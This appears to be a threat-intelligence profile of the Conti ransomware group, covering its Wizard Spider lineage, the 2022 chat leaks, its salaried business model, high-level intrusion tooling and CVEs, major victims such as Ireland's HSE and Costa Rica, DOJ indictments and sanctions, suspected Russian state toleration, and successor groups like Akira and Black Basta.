Conti was the most financially destructive ransomware operation ever documented. Operated by the Russia-based Wizard Spider criminal syndicate, it generated an estimated $180 million in extortion revenue in 2021 alone and accumulated over $2.7 billion across its full operational lifetime (Ryuk and Conti combined). Conti evolved from the TrickBot/Ryuk ecosystem into a full-spectrum Ransomware-as-a-Service empire, run with the organizational structure, HR departments, and professional divisions of a legitimate technology company.
Its implosion in May 2022 was triggered not by law enforcement, but by an internal actor: a Ukrainian security researcher who, incensed by Conti's public declaration of support for Russia's invasion of Ukraine, leaked nearly two years of internal communications. The brand collapsed; the organization did not. Core operators dispersed into a constellation of successor groups including Akira, Black Basta, Royal/BlackSuit, and others that continue operating as of May 2026. Conti is the progenitor of the most consequential criminal diaspora in ransomware history.
The Conti brand is defunct as of May 19, 2022. The core operating network, centered on the individual identified as Vitaly Kovalev (alias "Stern"), remains active through successor entities, with shared laundering infrastructure confirmed by TRM Labs through 2026. [1][4][6]
| Status | DEFUNCT (Conti brand, May 2022) / ACTIVE (diaspora entities, 2026) |
| First Observed | December 2019 (Conti deployments); antecedent Ryuk activity from September 2018 |
| Brand Shuttered | May 19, 2022 (AdvIntel confirmation) |
| Operator | Wizard Spider (CrowdStrike); GOLD ULRICK (Secureworks, Conti operators specifically) |
| Origin | Russia (Saint Petersburg assessed; UAE operations hub from ~2020) |
| Revenue Model | Hybrid RaaS: salaried core employees + limited affiliate revenue-sharing |
| Max Single Demand | $25 million (documented FBI figure) |
| Encryption | AES-256 (initial); ChaCha stream cipher (from August 2020, selective) |
| CIS Exclusion | Confirmed behavioral exclusion; binary kill-switch assessed but less publicly documented than peers |
| Decryptor Available | Bitdefender free decryptor (limited applicability; pre-key-rotation variants only) |
| US Reward Outstanding | $10M for leadership ID/location; $5M for arrest/conviction of conspirators |
| Successor Profiles | Akira | Black Basta (defunct) | Royal/BlackSuit | Karakurt |
| Date | Event |
|---|---|
| Dec 2019 | First observed Conti deployments, distributed via TrickBot |
| Jun 2020 | CrowdStrike first observes Conti in Big Game Hunting campaigns; full transition from Ryuk |
| Aug 2020 | Conti "Conti News" data leak site launched; ChaCha encryption adopted for speed |
| Oct 2020 | NSA disrupts TrickBot botnet; internal chats document Conti's real-time reaction |
| Jan 2021 | Emotet international law enforcement takedown forces Conti reorganization |
| May 2021 | Ireland HSE attack; near-complete shutdown of national health IT network; $20M demand |
| Aug 2021 | Disgruntled affiliate leaks Conti operational playbook (precursor leak) |
| Sep 2021 | CISA/FBI/NSA joint advisory; 400+ documented attacks publicly acknowledged |
| Dec 2021 | Conti is first professional ransomware group to adopt Log4Shell (CVE-2021-44228) |
| Feb 25, 2022 | Conti posts pro-Russia statement on Ukraine invasion |
| Feb 27, 2022 | @ContiLeaks begins publishing internal Jabber logs; 60,000+ messages first tranche |
| Mar 2022 | Conti source code and TrickBot administrator materials leaked; attacks surge despite leaks |
| Apr–May 2022 | Costa Rica attacks; first cyberattack to trigger a national state of emergency |
| May 19, 2022 | Conti brand officially shuttered; all infrastructure taken offline (AdvIntel) |
| Sep 2023 | DOJ unseals three federal indictments against nine Russian nationals; OFAC/FCDO sanction 11 |
| May 2025 | GangExposed begins publishing identities of Conti/TrickBot leadership; BKA names Kovalev |
| May 2026 | Deniss Zolotarjovs sentenced to 102 months: first major custodial sentence for Conti network |
Conti is a technical evolution of Ryuk ransomware, developed and operated by the same core group that CrowdStrike designates WIZARD SPIDER. CrowdStrike first observed Wizard Spider deploying TrickBot for financial fraud in 2016; the group deployed Ryuk in September 2018 for large-scale big game hunting; and between March and June 2020 the group completed its transition to Conti. The Ryuk-Conti-Wizard Spider lineage is corroborated by independent code analysis from multiple vendors, blockchain forensics from TRM Labs, personnel overlap documented in leaked chats, and infrastructure continuity across all three phases. No credible vendor disputes this lineage. [2][9][22]
Critical Rule: WIZARD SPIDER (CrowdStrike) and GOLD ULRICK (Secureworks) are distinct designations applied at different organizational levels. WIZARD SPIDER covers the umbrella criminal organization; GOLD ULRICK specifically designates the Conti ransomware operators. These must not be conflated. Mandiant's UNC1878 covers Wizard Spider broadly and predates the Conti era.
| Vendor | Designation | Scope |
|---|---|---|
| CrowdStrike | WIZARD SPIDER | Umbrella organization; Conti is a WIZARD SPIDER capability/sub-operation |
| Secureworks | GOLD ULRICK | Conti ransomware operators specifically (not the broader Wizard Spider entity) |
| Mandiant | UNC1878 | Wizard Spider parent organization; predates Conti era, applied broadly |
| Palo Alto Unit 42 | Conti Ransomware Gang | Tracked as part of "Ransom Cartel" ecosystem; no distinct proprietary name |
| Recorded Future | Conti | Rated second most prolific ransomware as of June 2024 tracker |
| Microsoft | TrickBot Group / Conti | No widely published distinct Microsoft-proprietary designation |
Note: Secureworks uses GOLD BLACKBURN for broader TrickBot-related criminal activity. Researchers should verify which designation a given vendor report is applying before drawing cross-vendor comparisons.
The Conti Leaks constitute the most comprehensive exposure of a criminal organization in cybersecurity history. The events unfolded across two major waves, beginning on February 27, 2022, and produced materials that form the evidentiary backbone for the majority of definitive Conti analysis. What follows is the authoritative account of the leak sequence and its investigative significance. [1][2][10]
Prior to the major 2022 leaks, a disgruntled Conti affiliate leaked the group's operational playbook in August 2021, revealing step-by-step intrusion procedures, tool preferences, and exploitation techniques. This prompted the September 2021 CISA/FBI/NSA joint advisory. The playbook leak was an early warning of internal tensions, particularly between affiliates who felt their treatment or revenue share was inadequate relative to the core team's salaried model. [11][43]
The catalytic event was Conti's February 25, 2022 public statement of support for Russia's invasion of Ukraine:
"The Conti Team is officially announcing a full support of Russian government... If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use all our possible resources to strike back at the critical infrastructures of an enemy."
Conti public statement, February 25, 2022Within 48 hours, on February 27, 2022, a new Twitter account @ContiLeaks began publishing internal Jabber/XMPP chat logs. According to Brian Krebs and Hold Security founder Alex Holden, the leaker was a Ukrainian security researcher acting on patriotic motivation: "The person releasing this is a Ukrainian and a patriot. He's seeing that Conti is supporting Russia in its invasion of Ukraine, and this is his way to stop them in his mind at least." [10]
The initial leak contained 339 JSON files covering January 29, 2021 to February 27, 2022. Subsequent releases extended coverage to June 22, 2020 to November 16, 2020, ultimately totaling over 170,000 internal chat messages. [2][24]
Krebs on Security published a landmark four-part investigative series based entirely on the leaked logs, constituting the definitive public analysis of Conti's internal operations:
- Part I: Evasion. How Conti detected and responded to law enforcement operations. Internal reaction when the NSA compromised TrickBot in September 2020 ("The one who made this garbage did it very well... It's just some kind of sabotage." - leader "Hof"). Crucially: Russian investigators were aware of the TrickBot/Conti investigation but had assured the group the inquiry would be closed by mid-November 2021. [10]
- Part II: The Office. Day-to-day operations, HR practices, salaries, and organizational structure. Documented pervasive burnout, employees pleading for time off, and leaders demanding 24/7 availability. Annual summer vacations in Crimea. Conti's effort to fund legal defense for arrested TrickBot coder Alla Witte, and the cynical suggestion to leverage that relationship for inside intelligence: "Let's try to find a way to her lawyer right now and offer him to directly sell the data bypassing her." [10][23]
- Part III: Weaponry. Conti's $60,000 legitimate Cobalt Strike license acquisition (via a $30,000 front company payment). Subscriptions to Crunchbase Pro and ZoomInfo for victim research. EDR tools (CrowdStrike Sentinel, Cylance) used to surveil its own administrators. A corrupt recovery firm negotiator nicknamed "The Spaniard" (described as Romanian, working for a large Canadian recovery firm). A journalist on payroll for 5% of payments to pressure non-paying victims. [23]
- Part IV: Cryptocrime. Founder Stern's obsession with building a proprietary peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot. A $100,000 writing contest on Exploit forum to solicit crypto platform ideas. Evidence of involvement in the SQUID pump-and-dump of October 2021. DDoS-based crypto market manipulation. [40]
On March 2, 2022, @ContiLeaks posted fresh logs, demonstrating the infiltrator retained access to infrastructure Conti had not detected. A separate account, @TrickBotLeaks, posted names, photos, and personal information of TrickBot administrators before being suspended within 24 hours.
The full leaked corpus included: 60,000+ internal Jabber messages (first tranche); full Conti Locker v2 source code; administrator panel source code; decryptor tool source code; Bitcoin addresses and wallet data; negotiation logs; infrastructure documentation; phishing templates; HR materials; and screenshots of the live Conti control panel with compromised host telemetry. [1][30][44]
The leaks initially had minimal operational impact. Secureworks (GOLD ULRICK tracking) noted that Conti victim postings actually increased in March 2022, reaching the second-highest monthly total since January 2021. The deeper damage was reputational and jurisdictional: the Conti brand became toxic for affiliates; victims paying Conti risked OFAC sanctions exposure; and the $15 million U.S. government bounty announced in May 2022 made the brand operationally untenable. The organization's response was strategic dissolution rather than destruction. [13][15][41]
In May 2025, a figure operating as GangExposed launched what The Register described as a "high-stakes intelligence war" against Conti's former leadership. GangExposed published detailed dossiers using OSINT, darknet database purchases, and claimed access to a leaked FSB border control database acquired for approximately $250,000. [18][19]
| Alias | Real Name (GangExposed) | BKA/DOJ Corroboration | Current Status |
|---|---|---|---|
| Stern / Ben / Demon | Vitaly Nikolaevich Kovalev, 36 (Russian) | Confirmed by BKA May 2025; Interpol Red Notice issued | At large in Russia; net worth assessed >$500M crypto |
| Professor | Vladimir Viktorovich Kvitko, 39 (Russian; relocated to Dubai ~2020) | US Rewards for Justice; $10M bounty; "burned" by GangExposed publication | Dubai; assessed actively involved in ongoing operations |
| Target | Unidentified (State Dept photo released Aug 2022) | $10M US bounty; identity not yet publicly confirmed | At large |
| Mango | Mikhail Mikhailovich Tsaryov | DOJ indictment (Sep 2023); GangExposed corroboration | At large in Russia |
| Defender | Andrey Yuryevich Zhuykov | DOJ indictment; UK NCA sanction (Sep 2023) | At large in Russia |
GangExposed's methodology and identity remain unverified. The Kovalev identification is treated as CONFIRMED given independent BKA corroboration. Other identifications are rated CREDIBLE. Technisanct/FalconFeeds assessed the source likely has insider access; other researchers assessed GangExposed could be a former criminal burning former associates. GangExposed stated goals: identify all ~50 key participants, disrupt the Blockchain Life crypto legitimization scheme, and deprive operators of UAE safe haven. [18]
Conti operated a hybrid model unique among ransomware groups. CISA noted in its September 2021 advisory: "It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds from a successful attack." The leaked chats confirmed this assessment: Conti maintained a dedicated, salaried workforce of 65-100+ employees paid bimonthly in Bitcoin, with limited external affiliate participation for specific access-broker roles.
Most low-level employees (testers, coders, administrators) earned $1,000–$2,000/month. High-performing coders could earn $5,000–$10,000/month. Senior managers confirmed to Stern on July 18, 2021 that the group employed 62 people; by July 30, payroll had grown to 87. [10][11][23]
The leaked chats documented a corporate-like internal structure with departments, separate budgets, and staff schedules:
- Coders: Programmers writing malicious code and integrating new capabilities
- Testers: Workers testing Conti malware against antivirus products, checking every ~4 hours for new Windows Defender updates
- Administrators: Infrastructure setup, teardown, VPN and server maintenance
- Reverse Engineers ("Reversers"): Disassembling code, studying commercial security products, finding vulnerabilities
- Penetration Testers / Hackers: Front-line operators conducting network intrusions
- OSINT Team: Using Crunchbase Pro, ZoomInfo, SignalHire, Shodan, and Spiderfoot Pro for victim research and financial intelligence
- HR Department: Actively recruiting from Russian job boards (including legitimate employment platforms) and cybercrime forums; reviewing 25–35% of relevant CVs on employment platforms
Conti also maintained what the leaked chats identified as relationships with external access brokers, paying 25–30% of ransom proceeds for specific network access. This was considered suboptimal given its cut into profit margins. [23]
Conti practiced "big game hunting" exclusively, targeting organizations with over $100 million in annual revenue. Ransom demands were typically set as a percentage of the victim's annual revenues. Operators used Crunchbase Pro and ZoomInfo to research victims' insurance coverage, earnings, and investor contacts for leverage. [10][23]
| Element | Detail |
|---|---|
| Ransom range | Up to $25 million per incident (single-victim maximum, FBI documented) |
| Reduction behavior | Reductions common; experienced negotiators could bring demands down substantially (e.g., sub-$100M revenue companies sometimes capped near $1M) |
| Payment deadline | Countdown timer on victim's dark web page; expiry triggered automatic data publication |
| Communication channels | Dark web negotiation portal; ProtonMail; VoIP calls |
| Corrupt insider negotiator | "The Spaniard" (Romanian, large Canadian recovery firm): maintained sympathetic relationship, shared victim internal deliberations with Conti operators |
| Journalist on payroll | As of March 2021, "Alarm" claimed access to a journalist who would write pressure articles against non-paying victims for 5% of payout |
| Double extortion | Primary demand for decryption key; separate demand for data non-publication. Paying for decryption did NOT guarantee data destruction |
| HSE precedent | Ireland HSE provided free decryptor after refusal to pay, but Conti reserved right to publish stolen data. Demonstrates keys and data are separate extortion levers |
| Vector | Detail | Period |
|---|---|---|
| TrickBot infections | Primary initial vector through 2021; distributed via malspam | 2019–2021 |
| BazarLoader / BazarBackdoor | Replaced TrickBot as primary delivery by March 2021 as TrickBot detections improved | 2021–2022 |
| Spear-phishing (malicious Excel) | Macros or links to Google Drive-hosted malware; IcedID dropper files also used | Throughout |
| CVE-2018-13379 | FortiGate SSL VPN path traversal; widely exploited across ransomware groups | Throughout |
| ProxyShell chain | CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 | Aug 2021+ |
| Log4Shell | CVE-2021-44228 | Dec 13, 2021+; Conti first professional group to weaponize; targeted VMware vCenter |
| PrintNightmare | CVE-2021-1675 | Referenced in CISA/FBI/NSA advisory |
| Stolen/weak RDP credentials | Sourced from access brokers and credential markets | Throughout |
| Fake software / SEO poisoning | Documented in CISA advisory | 2021+ |
Log4Shell First-Mover Significance: AdvIntel confirmed Conti was the first professional ransomware operation to adopt and embed CVE-2021-44228 in their attack chain, beginning December 13, 2021, targeting VMware vCenter servers. Within days, the attack chain extended to Emotet deployment followed by Cobalt Strike. This first-mover capability was a consistent Conti signature: rapid weaponization of critical CVEs before patching could occur at scale.
- Cobalt Strike: $60,000 legitimate license acquired via front company. Used for network reconnaissance, lateral movement, and in-memory payload execution.
- Mimikatz / LSASS credential dumping: Privilege escalation; overpass-the-hash Kerberos ticket acquisition documented in DFIR case studies.
- BumbleBee loader: Replaced BazarLoader in later operations (2022).
- SystemBC: Proxy/C2 tunneler for persistent access.
- PsExec + SMB: Lateral movement to distribute Cobalt Strike beacons across domain-joined systems.
- AnyDesk / RDP: Legitimate remote access tools for persistence; RDP sometimes proxied through IcedID process.
- GPO modification: Used to disable Windows Defender across domain; force-updated via Cobalt Strike beacon.
- Rclone / Mega.nz / dedicated VPS: Data exfiltration tooling; Rclone to cloud storage and purpose-built VPS instances for high-volume exfiltration.
The Conti playbook leak revealed a highly professional approach to dwell time: operators spent weeks inside networks before deploying ransomware. The Ireland HSE attack illustrates this: initial access on March 18, 2021, via a malicious Excel attachment; ransomware detonation not until May 14, 2021, eight weeks later, during which attackers moved across 180 systems and multiple domains. [37]
- Algorithm: AES-256 (initial); ChaCha stream cipher adopted August 2020 for selective, high-speed file encryption.
- Throughput: Multi-threaded engine using up to 32 simultaneous CPU threads. ZDNet documented Conti as using "32 simultaneous CPU threads for blazing-fast encryption" (July 2020).
- Key management: Asymmetric RSA wrapper around symmetric session key; public key embedded in binary, private key held by attackers.
- Variants: Encrypted file extension .ODMUA in some documented variants; ransom note named CONTI_README.txt.
- Decryptor: Bitdefender released a free Conti decryption tool after source code leak; applicability limited to variants encrypted before certain key rotation events.
Conti's consistent avoidance of CIS-region targets across more than 1,000 confirmed attacks, with no known exceptions, is an operational signature consistent with an implicit non-prosecution understanding with Russian authorities. Binary analysis indicates Conti checks for Russian keyboard layout installation as a kill switch, consistent with the standard CIS-exclusion pattern used by other Russia-based groups. The behavioral exclusion is documented across all major sector-targeting data; the specific binary implementation details are less publicly documented than peers such as REvil. [9]
Conti developed a dedicated Linux/ESXi variant targeting VMware virtual machine infrastructure, consistent with the group's enterprise-focused targeting. This variant was documented by SentinelOne and became a direct template for successor groups. Akira inherited the Conti ESXi playbook and extended it with additional VMware-targeting capabilities documented in joint FBI/CISA advisories. [39]
Conti demanded payment exclusively in Bitcoin (BTC). Chainalysis identified Conti generating at least $180 million in 2021, the highest of any ransomware group that year. Total lifetime revenue across Ryuk/Conti operations is assessed at approximately $2.7 billion. The UK NCA and Chainalysis jointly assessed Conti and TrickBot attempted to extort more than $800 million from victims including hospitals, schools, local authorities, and businesses. [5][17][40]
- Payroll: $1,000–$2,000/month for most employees; $5,000–$10,000 for senior coders; distributed in Bitcoin bimonthly
- Ransom receipts: Single highest documented payment: $25M; Ireland HSE demanded $20M (not paid)
- Costa Rica: $20M demand; government refused; no payment made
Krebs on Security's deep analysis of leaked chats (Part IV: Cryptocrime) documented extensive laundering and investment schemes directed personally by founder "Stern" (Kovalev): [40]
- Proprietary crypto platform: Kovalev was developing a peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot with integrated NFT, DeFi, and DEX functionality, intended as a vehicle to legitimize illicit proceeds.
- $100,000 crypto article contest: Sponsored on the Russian-language Exploit cybercrime forum to solicit intellectual property for the platform while simultaneously serving as criminal recruitment.
- SQUID pump-and-dump: Evidence in chat logs suggests Conti involvement in the October–November 2021 SQUID token scam, which appreciated from $0.01 to $2,856 before the developers extracted approximately $3.38 million.
- DDoS-driven crypto manipulation: An internal scheme involving DDoSing small cryptocurrency mining pools, then posing as distressed users in Discord to drive prices down before purchasing.
- Blockchain Life Forum: GangExposed's 2025 investigation revealed Kovalev and associate Khitrov organized the "Blockchain Life" forum as a legitimization vehicle for illicitly obtained cryptocurrency earnings.
TRM Labs corroborated Conti-Ryuk blockchain ties through salary wallet analysis and on-chain transaction mapping, confirming shared financial infrastructure across both phases of Wizard Spider ransomware operations. In a separate 2023 analysis, TRM documented Conti's re-emergence as three successor groups. TRM Labs' 2026 reporting on Akira specifically confirmed that Conti's successor ecosystem (including Akira) continued sharing laundering infrastructure, providing blockchain continuity evidence linking the diaspora to the original Conti network. [22][4]
- Over 1,000 attacks confirmed globally (FBI/CISA advisory, updated)
- DOJ 2023 indictment figures: more than 900 victims in approximately 47 U.S. states, D.C., Puerto Rico, and approximately 31 foreign countries
- $180M revenue in 2021 alone (Chainalysis); ~$2.7B total (Ryuk/Conti lifetime)
- Over $150M in ransom payments per State Department figures at time of $15M reward announcement
Conti deliberately focused on sectors with low tolerance for downtime and high pressure to pay. Healthcare was the most systematically targeted sector; the FBI documented at least 16 Conti attacks on U.S. healthcare and first-responder networks by May 2021 alone.
| Sector | Targeting Priority | Rationale |
|---|---|---|
| Healthcare / Hospitals | Highest | Life-critical downtime pressure; low tolerance for delay; data sensitivity |
| Emergency Services / First Responders | High | 911 dispatch, EMS; non-negotiable uptime dependency |
| Government (local/national) | High | Political pressure to restore services; large IT budgets imply capacity to pay |
| Education | Moderate-High | Student/staff data leverage; large datasets |
| Critical Infrastructure | Moderate-High | Utilities, transportation; operational impact amplifies ransom pressure |
| Private Enterprise ($100M+ revenue) | High (policy minimum) | Big game hunting threshold; all commercial targets filtered by revenue floor |
Primary targets concentrated in North America (~75% U.S.-based per early FBI figures). Significant European targeting documented (UK: 149 known victims, £27 million extracted per NCA). Consistent behavioral exclusion of CIS-region targets across all documented attacks. [17][28]
| Victim | Date | Impact | Notable Detail |
|---|---|---|---|
| Ireland HSE (Health Service Executive) | May 2021 | Near-complete shutdown of national health IT; cancer screenings and appointments canceled; 80%+ encryption | Cost estimated >$600M to remediate. Conti provided free decryptor after government refusal to pay $20M demand, but threatened data publication. First access: March 18, 2021 via malicious Excel attachment. Eight weeks of dwell time before detonation. [12][23] |
| Government of Costa Rica | Apr–May 2022 | ~30 government institutions including Ministry of Finance; national state of emergency declared | First cyberattack to trigger a national emergency declaration globally. $20M demand; government refused. Used as cover for Conti brand dissolution. [14][42] |
| Broward County Public Schools | Mar 2021 | School district encrypted; $40M ransom demand; threat to release student data | Notable for targeting of minors' educational records as leverage |
| Scripps Health (California) | May 2021 | Major California health system; patient care disrupted | Specific DOJ indictment filed against Maksim Galochkin for this attack [16] |
| Advantech | Nov 2020 | Industrial IoT manufacturer; 3 GB of data stolen | Early high-profile Conti DLS posting [24] |
| City of Tulsa | May 2021 | Government network compromise | Named in BleepingComputer reporting [24] |
On September 7, 2023, the DOJ unsealed three federal indictments across three jurisdictions, charging nine Russian nationals:
| Jurisdiction | Charges | Max Penalty | Named Defendants |
|---|---|---|---|
| N.D. Ohio (TrickBot conspiracy) | Conspiracy to violate CFAA; wire fraud conspiracy; money laundering conspiracy | 62 years | Galochkin, Rudenskiy, Tsarev, Zhuykov, Putilin, Loguntsov, Mikhaylov, Karyagin, Khaliullin |
| M.D. Tennessee (Conti conspiracy) | Conspiring to use Conti ransomware against U.S. targets 2020–Jun 2022 | 25 years | Galochkin, Rudenskiy, Tsarev, Zhuykov |
| S.D. California (Scripps Health) | Specific attack on Scripps Health May 1, 2021; impaired medical care | 20 years | Maksim Galochkin specifically |
All named defendants remain at large in Russia as of May 2026. [16]
| Individual | Role | Action | Outcome |
|---|---|---|---|
| Alla Witte | TrickBot programmer (Latvian national) | Arrested 2021; charged | Pleaded guilty to conspiracy to commit computer fraud; sentenced to 32 months, June 2023 |
| Vladimir Dunaev | TrickBot developer (Russian national) | Arrested; in U.S. custody in Cleveland | Pending trial as of 2024 |
| Deniss Zolotarjovs | Conti-linked organization (Latvian, based Moscow); operated under Conti, Karakurt, Royal, TommyLeaks, SchoolBoys, Akira brands | Arrested in Georgia Dec 2023; extradited to U.S. | Pleaded guilty July 2025 to conspiracy to commit money laundering and wire fraud; sentenced to 102 months May 2026. First major custodial sentence in Conti network. [6][47] |
The U.S. OFAC and UK FCDO simultaneously sanctioned 11 Russian nationals connected to Conti and TrickBot: Andrey Zhuykov, Maksim Galochkin, Maksim Rudenskiy, Mikhail Tsarev, Dmitry Putilin, Maksim Khaliullin, Sergey Loguntsov, Vadym Valiakhmetov, Artem Kurov, Mikhail Chernov, and Alexander Mozhaev. Sanctions prohibit financial transactions and enable asset seizure by U.S. and UK governments. [17]
- May 2021: FBI alert specifically warning healthcare sector; 16 attacks on healthcare/first responder networks documented
- September 2021: Joint CISA/FBI/NSA advisory documenting 400+ attacks, TTPs, and mitigations
- May 2022: State Department Rewards for Justice: up to $10M for Conti leadership identification/location; up to $5M for arrest/conviction
- August 2022: Rewards for Justice expanded: five specific operators named; photograph of "Target" released publicly
- May 2025: BKA Germany names Vitaly Kovalev as Conti/TrickBot founder; Interpol Red Notice issued
The leaked Jabber logs contain the most direct documentation of Conti's communication with Russian law enforcement available in open-source reporting. In October 2021, Conti member "Kagas" wrote to Stern:
"Our old case was resumed... The Americans officially requested information about Russian hackers... Next Tuesday, the investigator called us for a conversation, but for now, it's like [we're being called on as] witnesses. That way if the case is suspended, they can't interrogate us in any way."
Conti member "Kagas" to Stern, October 2021 (leaked chat log)A separate Conti member immediately reported that the group's contacts had assured it the Russian-side investigation would go nowhere and would be closed by mid-November 2021. This same period saw Russian investigators appearing more interested in pursuing REvil members than Conti, culminating in the January 2022 FSB arrests of REvil, which many analysts assessed as a political gesture timed to the Ukraine buildup. The leaked chats also reference Liteyny Avenue in Saint Petersburg, home to FSB offices, in a context suggesting external contact with a helpful government-adjacent source. [10][22]
| Vendor | Assessment | Date |
|---|---|---|
| Mandiant | "At least a portion of actors involved with CONTI ransomware are based in Russia and some criminals operating from there already have documented ties with Russian intelligence apparatus. More recently, publicly reported chat logs suggest that a key player in CONTI operations may have intended to provide support for government projects." | Feb 2022 |
| U.S. Department of State | Explicitly labeled Conti a "Russian government-linked ransomware-as-a-service (RaaS) group" in August 2022 Rewards for Justice announcement. Strongest public U.S. government characterization; falls short of confirming formal intelligence relationship. | Aug 2022 |
| Recorded Future (Dark Covenant 3.0) | Documents ongoing pattern of Russian government tolerance for cybercriminal activity in exchange for geopolitical utility; Conti cited as defining case study in protected criminal enterprise model. | Oct 2025 |
The available evidence supports a moderate-to-high confidence assessment of implicit state toleration. Conti received advance warning from Russian investigators, operated openly in Russia without prosecution, and consistently avoided CIS targets across 1,000+ documented attacks. The leaked chats document direct back-channel communication between Conti leadership and Russian law enforcement. A formal, active intelligence-sharing or tasking relationship cannot be confirmed from public evidence. The operational distinction is likely: Conti's ransomware attacks generated hard currency and geopolitical leverage that served Russian state interests without requiring formal direction. The protected criminal enterprise model eliminates the state's deniability costs while preserving its operational benefits.
The reference to Liteyny Avenue (FSB headquarters street) in leaked communications, combined with the demonstrated advance warning of law enforcement inquiries, is consistent with an active FSB liaison relationship rather than passive tolerance. This remains analyst inference; the chats establish contact but not formal tasking. [10][48]
| Alias | Real Name | Age | Nationality | Role | Source |
|---|---|---|---|---|---|
| Stern / Ben / Demon | Vitaly Nikolaevich Kovalev | 36 | Russian | Founder/CEO of TrickBot and Conti; supreme leader | BKA Germany; GangExposed 2025 [25][19] |
| Professor | Vladimir Viktorovich Kvitko | 39 | Russian (Dubai) | Senior general; offshore operations; Dubai hub | GangExposed 2025; US RFJ bounty [26][18] |
| Mango | Mikhail Mikhailovich Tsaryov | N/A | Russian | Mid-level manager; day-to-day operations | DOJ indictment 2023; GangExposed [16][18] |
| Defender | Andrey Yuryevich Zhuykov | N/A | Russian | Lead systems administrator | DOJ indictment; UK NCA sanction [16][17] |
| Bentley | Maksim Galochkin | N/A | Russian | Crypter / obfuscation; indicted in three jurisdictions | DOJ indictment [16] |
| Buza | Maksim Rudenskiy | N/A | Russian | Developer supervisor | DOJ indictment [16] |
| Target | Unidentified | N/A | Assessed Russian | Senior leader; luxury assets (Ferrari, Maybach) | US RFJ $10M bounty; photo released Aug 2022 [27] |
The Conti collapse was an own-goal triggered by geopolitics. The group's public declaration of support for Russia's invasion of Ukraine was catastrophically ill-considered:
- It exposed the group's Russian identity and state alignment to affiliates who had operational security reasons to maintain deniability
- It triggered the Ukrainian insider who had penetrated Conti's infrastructure to act, releasing the most comprehensive criminal organization leak in cybercrime history
- It made the Conti brand a liability for victims: paying Conti created sanctions violation exposure under OFAC
- It caused direct internal fracture along ethnic lines, with Ukrainian members becoming adversaries
AdvIntel's Boguslavskiy and Kremez concluded: "The Conti brand, not the organization itself, is shutting down." The Costa Rica attack served simultaneously as a final high-profile operation, cover for migrating members and infrastructure, and a capability demonstration to affiliates considering defection to competing groups. [15][14]
| Group | Relationship to Conti | Evidence Basis | Confidence |
|---|---|---|---|
| TrickBot | Absorbed by Conti; shared personnel and leadership | Chat logs; DOJ indictments confirm shared defendants | CONFIRMED |
| Ryuk | Technical and personnel predecessor | Code overlap; personnel (Professor's code comment); TRM Labs blockchain forensics | CONFIRMED |
| Emotet ("Booz") | Distribution partner and platform | Chat logs confirm deep integration; Emotet had 50+ coders referenced | CONFIRMED |
| BazarLoader/BazarBackdoor | Distribution vehicle replacing TrickBot | CISA advisory; security research | CONFIRMED |
Court-Confirmed Cluster: The DOJ's May 2026 sentencing of Deniss Zolotarjovs provides court-confirmed documentation of the Conti cluster model. His organization used ransom note brands including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, confirming these were overlapping operational identities used by the same core actor network, not independent organizations. [6][47]
| Group | Relationship | Status (May 2026) | Key Evidence | Confidence | Profile |
|---|---|---|---|---|---|
| Black Basta | Conti offshoot; emerged April 2022 | Defunct (Feb 2025, own chat leak) | Shared TTPs; Black Basta leaked chats confirmed former Conti actors; TRM Labs blockchain analysis | HIGH (Analyst1, TRM Labs) [49][50] | N/A |
| Karakurt | Conti side operation / extortion-only branch | Active (reduced) | Blockchain analysis: direct wallet connections to Conti; Arctic Wolf and Chainalysis corroboration; Zolotarjovs sentence confirms overlap [51] | HIGH | N/A |
| Royal / BlackSuit | Conti member continuation; assessed core Wizard Spider tier | Active as BlackSuit | BushidoToken threat intel; shared personnel and infrastructure indicators; FBI advisory confirms Conti connection [52] | MEDIUM-HIGH | N/A |
| Akira | Conti operator continuation; affiliate and mid-tier operator continuity | Active (2026) | Blockchain evidence (TRM Labs 2026); shared laundering infrastructure; Russian-language artifacts; US sanctions and Zolotarjovs sentence confirm Conti lineage [4][6] | HIGH | View Profile → |
| BlackByte | Conti spinoff | Active (reduced) | AdvIntel/Kremez assessment; infrastructure overlap [15] | MEDIUM | N/A |
| Diavol | Conti/TrickBot sub-operation | Largely dormant | Code and infrastructure analysis; Arctic Wolf [51] | MEDIUM-HIGH | N/A |
The February 2025 Black Basta internal chat leak followed the same pattern as the original Conti leak: an insider/disgruntled member published internal communications, directly contributing to the group's dissolution. The Conti diaspora appears condemned to repeat the cycle. The organizational model of large, salaried, multi-ethnic workforces creates structural insider threat exposure that pure-affiliate models do not share. Each generation of Conti-lineage groups inherits both the operational playbook and this structural vulnerability.
- "Target" identity: Despite a $10M U.S. bounty and GangExposed's stated intent to identify him, Target's real name has not been publicly confirmed
- Full financial scope: Total cryptocurrency holdings and current wallet infrastructure of the Conti diaspora are partially mapped but not fully documented
- Formal state intelligence relationship: The exact nature of FSB involvement or passive tolerance remains an open question; leaked chats establish back-channel contact but not formal tasking
- GangExposed identity and motivation: Source's own identity, access method, and motivations remain unconfirmed; possibility that GangExposed is state-adjacent cannot be ruled out
- Akira/Royal operational leadership: Actor overlap assessed with high confidence; full attribution of current operational leadership to specific former Conti individuals is incomplete in public reporting